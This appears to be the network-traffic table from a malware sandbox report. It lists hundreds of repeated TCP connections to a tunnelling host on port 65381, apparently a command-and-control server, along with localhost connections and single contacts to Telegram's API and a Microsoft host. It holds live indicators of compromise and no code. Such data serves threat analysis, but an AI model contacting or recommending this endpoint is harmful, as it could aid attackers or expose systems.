| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| N/A | 127.0.0.1:50150 | tcp | |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| N/A | 127.0.0.1:50224 | tcp | |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| N/A | 127.0.0.1:50250 | tcp | |
| N/A | 127.0.0.1:50264 | tcp | |
| N/A | 127.0.0.1:50278 | tcp | |
| N/A | 127.0.0.1:50290 | tcp | |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 2.18.190.173:80 | msedge.b.tlu.dl.delivery.mp.microsoft.com | tcp |
| N/A | 127.0.0.1:50305 | tcp | |
| N/A | 127.0.0.1:50322 | tcp | |
| N/A | 127.0.0.1:50335 | tcp | |
| N/A | 127.0.0.1:50347 | tcp | |
| N/A | 127.0.0.1:50369 | tcp | |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| N/A | 127.0.0.1:50373 | tcp | |
| N/A | 127.0.0.1:50400 | tcp | |
| N/A | 127.0.0.1:50417 | tcp | |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| N/A | 127.0.0.1:50449 | tcp | |
| N/A | 127.0.0.1:50467 | tcp | |
| N/A | 127.0.0.1:50485 | tcp | |
| N/A | 127.0.0.1:50510 | tcp | |
| N/A | 127.0.0.1:50574 | tcp | |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| N/A | 127.0.0.1:50596 | tcp | |
| N/A | 127.0.0.1:50615 | tcp | |
| N/A | 127.0.0.1:50635 | tcp | |
| N/A | 127.0.0.1:50651 | tcp | |
| N/A | 127.0.0.1:50667 | tcp | |
| N/A | 127.0.0.1:50685 | tcp | |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| N/A | 127.0.0.1:50698 | tcp | |
| N/A | 127.0.0.1:50716 | tcp | |
| N/A | 127.0.0.1:50728 | tcp | |
| N/A | 127.0.0.1:50748 | tcp | |
| N/A | 127.0.0.1:50764 | tcp | |
| N/A | 127.0.0.1:50782 | tcp | |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| N/A | 127.0.0.1:50817 | tcp | |
| N/A | 127.0.0.1:50843 | tcp | |
| N/A | 127.0.0.1:50865 | tcp | |
| N/A | 127.0.0.1:50879 | tcp | |
| N/A | 127.0.0.1:50908 | tcp | |
| N/A | 127.0.0.1:50915 | tcp | |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| N/A | 127.0.0.1:50950 | tcp | |
| N/A | 127.0.0.1:50971 | tcp | |
| N/A | 127.0.0.1:50974 | tcp | |
| N/A | 127.0.0.1:50987 | tcp | |
| N/A | 127.0.0.1:51024 | tcp | |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| N/A | 127.0.0.1:51033 | tcp | |
| N/A | 127.0.0.1:51058 | tcp | |
| N/A | 127.0.0.1:51067 | tcp | |
| N/A | 127.0.0.1:51106 | tcp | |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| N/A | 127.0.0.1:51118 | tcp | |
| N/A | 127.0.0.1:51141 | tcp | |
| N/A | 127.0.0.1:51157 | tcp | |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| N/A | 127.0.0.1:51194 | tcp | |
| N/A | 127.0.0.1:51267 | tcp | |
| N/A | 127.0.0.1:51282 | tcp | |
| N/A | 127.0.0.1:51377 | tcp | |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| N/A | 127.0.0.1:51392 | tcp | |
| N/A | 127.0.0.1:51445 | tcp | |
| N/A | 127.0.0.1:51462 | tcp | |
| N/A | 127.0.0.1:51495 | tcp | |
| N/A | 127.0.0.1:51513 | tcp | |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| N/A | 127.0.0.1:51528 | tcp | |
| N/A | 127.0.0.1:51553 | tcp | |
| N/A | 127.0.0.1:51556 | tcp | |
| N/A | 127.0.0.1:51580 | tcp | |
| N/A | 127.0.0.1:51600 | tcp | |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| N/A | 127.0.0.1:51617 | tcp | |
| N/A | 127.0.0.1:51633 | tcp | |
| N/A | 127.0.0.1:51648 | tcp | |
| N/A | 127.0.0.1:51667 | tcp | |
| N/A | 127.0.0.1:51683 | tcp | |
| N/A | 127.0.0.1:51703 | tcp | |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| N/A | 127.0.0.1:51715 | tcp | |
| N/A | 127.0.0.1:51734 | tcp | |
| N/A | 127.0.0.1:51749 | tcp | |
| N/A | 127.0.0.1:51763 | tcp | |
| N/A | 127.0.0.1:51787 | tcp | |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| N/A | 127.0.0.1:51809 | tcp | |
| N/A | 127.0.0.1:51825 | tcp | |
| N/A | 127.0.0.1:51848 | tcp | |
| N/A | 127.0.0.1:51851 | tcp | |
| N/A | 127.0.0.1:51881 | tcp | |
| N/A | 127.0.0.1:51884 | tcp | |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| N/A | 127.0.0.1:51914 | tcp | |
| N/A | 127.0.0.1:51929 | tcp | |
| N/A | 127.0.0.1:51961 | tcp | |
| N/A | 127.0.0.1:51977 | tcp | |
| N/A | 127.0.0.1:52004 | tcp | |
| N/A | 127.0.0.1:52007 | tcp | |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| N/A | 127.0.0.1:52035 | tcp | |
| N/A | 127.0.0.1:52045 | tcp | |
| N/A | 127.0.0.1:52073 | tcp | |
| N/A | 127.0.0.1:52089 | tcp | |
| N/A | 127.0.0.1:52105 | tcp | |
| N/A | 127.0.0.1:52128 | tcp | |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| N/A | 127.0.0.1:52151 | tcp | |
| N/A | 127.0.0.1:52170 | tcp | |
| N/A | 127.0.0.1:52181 | tcp | |
| N/A | 127.0.0.1:52195 | tcp | |
| N/A | 127.0.0.1:52226 | tcp | |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| N/A | 127.0.0.1:52243 | tcp | |
| N/A | 127.0.0.1:52254 | tcp | |
| N/A | 127.0.0.1:52268 | tcp | |
| N/A | 127.0.0.1:52292 | tcp | |
| N/A | 127.0.0.1:52321 | tcp | |
| N/A | 127.0.0.1:52347 | tcp | |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| N/A | 127.0.0.1:52360 | tcp | |
| N/A | 127.0.0.1:52393 | tcp | |
| N/A | 127.0.0.1:52409 | tcp | |
| N/A | 127.0.0.1:52419 | tcp | |
| N/A | 127.0.0.1:52449 | tcp | |
| N/A | 127.0.0.1:52468 | tcp | |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| N/A | 127.0.0.1:52484 | tcp | |
| N/A | 127.0.0.1:52499 | tcp | |
| N/A | 127.0.0.1:52520 | tcp | |
| N/A | 127.0.0.1:52545 | tcp | |
| N/A | 127.0.0.1:52551 | tcp | |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| N/A | 127.0.0.1:52583 | tcp | |
| N/A | 127.0.0.1:52602 | tcp | |
| N/A | 127.0.0.1:52627 | tcp | |
| N/A | 127.0.0.1:52651 | tcp | |
| N/A | 127.0.0.1:52654 | tcp | |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| N/A | 127.0.0.1:52680 | tcp | |
| N/A | 127.0.0.1:52695 | tcp | |
| N/A | 127.0.0.1:52710 | tcp | |
| N/A | 127.0.0.1:52742 | tcp | |
| N/A | 127.0.0.1:52757 | tcp | |
| N/A | 127.0.0.1:52775 | tcp | |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| N/A | 127.0.0.1:52788 | tcp | |
| N/A | 127.0.0.1:52808 | tcp | |
| N/A | 127.0.0.1:52820 | tcp | |
| N/A | 127.0.0.1:52836 | tcp | |
| N/A | 127.0.0.1:52842 | tcp | |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| N/A | 127.0.0.1:52868 | tcp | |
| N/A | 127.0.0.1:52887 | tcp | |
| N/A | 127.0.0.1:52904 | tcp | |
| N/A | 127.0.0.1:52917 | tcp | |
| N/A | 127.0.0.1:52931 | tcp | |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| N/A | 127.0.0.1:52949 | tcp | |
| N/A | 127.0.0.1:52961 | tcp | |
| N/A | 127.0.0.1:52981 | tcp | |
| N/A | 127.0.0.1:53003 | tcp | |
| N/A | 127.0.0.1:53018 | tcp | |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| N/A | 127.0.0.1:53030 | tcp | |
| N/A | 127.0.0.1:53048 | tcp | |
| N/A | 127.0.0.1:53052 | tcp | |
| N/A | 127.0.0.1:53076 | tcp | |
| N/A | 127.0.0.1:53092 | tcp | |
| N/A | 127.0.0.1:53107 | tcp | |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| N/A | 127.0.0.1:53115 | tcp | |
| N/A | 127.0.0.1:53119 | tcp | |
| N/A | 127.0.0.1:53125 | tcp | |
| N/A | 127.0.0.1:53132 | tcp | |
| N/A | 127.0.0.1:53140 | tcp | |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| N/A | 127.0.0.1:53147 | tcp | |
| N/A | 127.0.0.1:53162 | tcp | |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| N/A | 127.0.0.1:53249 | tcp | |
| N/A | 127.0.0.1:53264 | tcp | |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| N/A | 127.0.0.1:53270 | tcp | |
| N/A | 127.0.0.1:53294 | tcp | |
| N/A | 127.0.0.1:53311 | tcp | |
| N/A | 127.0.0.1:53326 | tcp | |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| N/A | 127.0.0.1:53343 | tcp | |
| N/A | 127.0.0.1:53358 | tcp | |
| N/A | 127.0.0.1:53362 | tcp | |
| N/A | 127.0.0.1:53388 | tcp | |
| N/A | 127.0.0.1:53392 | tcp | |
| N/A | 127.0.0.1:53419 | tcp | |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| N/A | 127.0.0.1:53434 | tcp | |
| N/A | 127.0.0.1:53438 | tcp | |
| N/A | 127.0.0.1:53471 | tcp | |
| N/A | 127.0.0.1:53474 | tcp | |
| N/A | 127.0.0.1:53510 | tcp | |
| N/A | 127.0.0.1:53513 | tcp | |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| N/A | 127.0.0.1:53541 | tcp | |
| N/A | 127.0.0.1:53545 | tcp | |
| N/A | 127.0.0.1:53561 | tcp | |
| N/A | 127.0.0.1:53575 | tcp | |
| N/A | 127.0.0.1:53579 | tcp | |
| N/A | 127.0.0.1:53617 | tcp | |
| N/A | 127.0.0.1:53621 | tcp | |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| N/A | 127.0.0.1:53627 | tcp | |
| N/A | 127.0.0.1:53651 | tcp | |
| N/A | 127.0.0.1:53667 | tcp | |
| N/A | 127.0.0.1:53691 | tcp | |
| N/A | 127.0.0.1:53706 | tcp | |
| N/A | 127.0.0.1:53721 | tcp | |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| N/A | 127.0.0.1:53734 | tcp | |
| N/A | 127.0.0.1:53751 | tcp | |
| N/A | 127.0.0.1:53767 | tcp | |
| N/A | 127.0.0.1:53784 | tcp | |
| N/A | 127.0.0.1:53788 | tcp | |
| N/A | 127.0.0.1:53812 | tcp | |
| N/A | 127.0.0.1:53827 | tcp | |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| N/A | 127.0.0.1:53844 | tcp | |
| N/A | 127.0.0.1:53847 | tcp | |
| N/A | 127.0.0.1:53871 | tcp | |
| N/A | 127.0.0.1:53889 | tcp | |
| N/A | 127.0.0.1:53903 | tcp | |
| N/A | 127.0.0.1:53909 | tcp | |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| N/A | 127.0.0.1:53949 | tcp | |
| N/A | 127.0.0.1:53963 | tcp | |
| N/A | 127.0.0.1:53976 | tcp | |
| N/A | 127.0.0.1:53993 | tcp | |
| N/A | 127.0.0.1:54009 | tcp | |
| N/A | 127.0.0.1:54024 | tcp | |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| N/A | 127.0.0.1:54040 | tcp | |
| N/A | 127.0.0.1:54055 | tcp | |
| N/A | 127.0.0.1:54071 | tcp | |
| N/A | 127.0.0.1:54085 | tcp | |
| N/A | 127.0.0.1:54110 | tcp | |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| N/A | 127.0.0.1:54148 | tcp | |
| N/A | 127.0.0.1:54151 | tcp | |
| N/A | 127.0.0.1:54167 | tcp | |
| N/A | 127.0.0.1:54182 | tcp | |
| N/A | 127.0.0.1:54197 | tcp | |
| N/A | 127.0.0.1:54210 | tcp | |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| N/A | 127.0.0.1:54217 | tcp | |
| N/A | 127.0.0.1:54243 | tcp | |
| N/A | 127.0.0.1:54260 | tcp | |
| N/A | 127.0.0.1:54264 | tcp | |
| N/A | 127.0.0.1:54309 | tcp | |
| N/A | 127.0.0.1:54324 | tcp | |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| N/A | 127.0.0.1:54339 | tcp | |
| N/A | 127.0.0.1:54355 | tcp | |
| N/A | 127.0.0.1:54372 | tcp | |
| N/A | 127.0.0.1:54387 | tcp | |
| N/A | 127.0.0.1:54391 | tcp | |
| N/A | 127.0.0.1:54421 | tcp | |
| N/A | 127.0.0.1:54434 | tcp | |
| N/A | 127.0.0.1:54451 | tcp | |
| N/A | 127.0.0.1:54454 | tcp | |
| N/A | 127.0.0.1:54489 | tcp | |
| N/A | 127.0.0.1:54506 | tcp | |
| N/A | 127.0.0.1:54522 | tcp | |
| N/A | 127.0.0.1:54539 | tcp | |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| N/A | 127.0.0.1:54542 | tcp | |
| N/A | 127.0.0.1:54569 | tcp | |
| N/A | 127.0.0.1:54586 | tcp | |
| N/A | 127.0.0.1:54597 | tcp | |
| N/A | 127.0.0.1:54628 | tcp | |
| N/A | 127.0.0.1:54632 | tcp | |
| N/A | 127.0.0.1:54658 | tcp | |
| N/A | 127.0.0.1:54673 | tcp | |
| N/A | 127.0.0.1:54691 | tcp | |
| N/A | 127.0.0.1:54699 | tcp | |
| N/A | 127.0.0.1:54711 | tcp | |
| N/A | 127.0.0.1:54742 | tcp | |
| N/A | 127.0.0.1:54746 | tcp | |
| N/A | 127.0.0.1:54788 | tcp | |
| N/A | 127.0.0.1:54794 | tcp | |
| N/A | 127.0.0.1:54803 | tcp | |
| N/A | 127.0.0.1:54833 | tcp | |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| N/A | 127.0.0.1:54847 | tcp | |
| N/A | 127.0.0.1:54852 | tcp | |
| N/A | 127.0.0.1:54886 | tcp | |
| N/A | 127.0.0.1:54902 | tcp | |
| N/A | 127.0.0.1:54917 | tcp | |
| N/A | 127.0.0.1:54935 | tcp | |
| N/A | 127.0.0.1:54948 | tcp | |
| N/A | 127.0.0.1:54966 | tcp | |
| N/A | 127.0.0.1:54970 | tcp | |
| N/A | 127.0.0.1:54998 | tcp | |
| N/A | 127.0.0.1:55003 | tcp | |
| N/A | 127.0.0.1:55030 | tcp | |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| N/A | 127.0.0.1:55051 | tcp | |
| N/A | 127.0.0.1:55055 | tcp | |
| N/A | 127.0.0.1:55095 | tcp | |
| N/A | 127.0.0.1:55100 | tcp | |
| N/A | 127.0.0.1:55128 | tcp | |
| N/A | 127.0.0.1:55131 | tcp | |
| N/A | 127.0.0.1:55147 | tcp | |
| N/A | 127.0.0.1:55163 | tcp | |
| N/A | 127.0.0.1:55178 | tcp | |
| N/A | 127.0.0.1:55203 | tcp | |
| N/A | 127.0.0.1:55228 | tcp | |
| N/A | 127.0.0.1:55235 | tcp | |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| N/A | 127.0.0.1:55264 | tcp | |
| N/A | 127.0.0.1:55280 | tcp | |
| N/A | 127.0.0.1:55294 | tcp | |
| N/A | 127.0.0.1:55312 | tcp | |
| N/A | 127.0.0.1:55316 | tcp | |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| N/A | 127.0.0.1:55344 | tcp | |
| N/A | 127.0.0.1:55360 | tcp | |
| N/A | 127.0.0.1:55363 | tcp | |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
